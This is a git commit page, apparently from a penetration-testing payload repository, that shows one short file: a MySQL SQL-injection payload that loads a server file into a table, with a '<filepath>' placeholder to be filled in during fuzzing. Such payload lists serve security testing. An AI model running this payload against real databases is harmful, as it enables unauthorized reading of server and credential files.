rename 's/_/-/g'

This commit is contained in:
g0tmi1k
2017-08-23 14:55:06 +01:00
parent 1ab1b5d40e
commit 25d4ac447e
291 changed files with 0 additions and 3388 deletions

View File

@@ -0,0 +1,3 @@
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;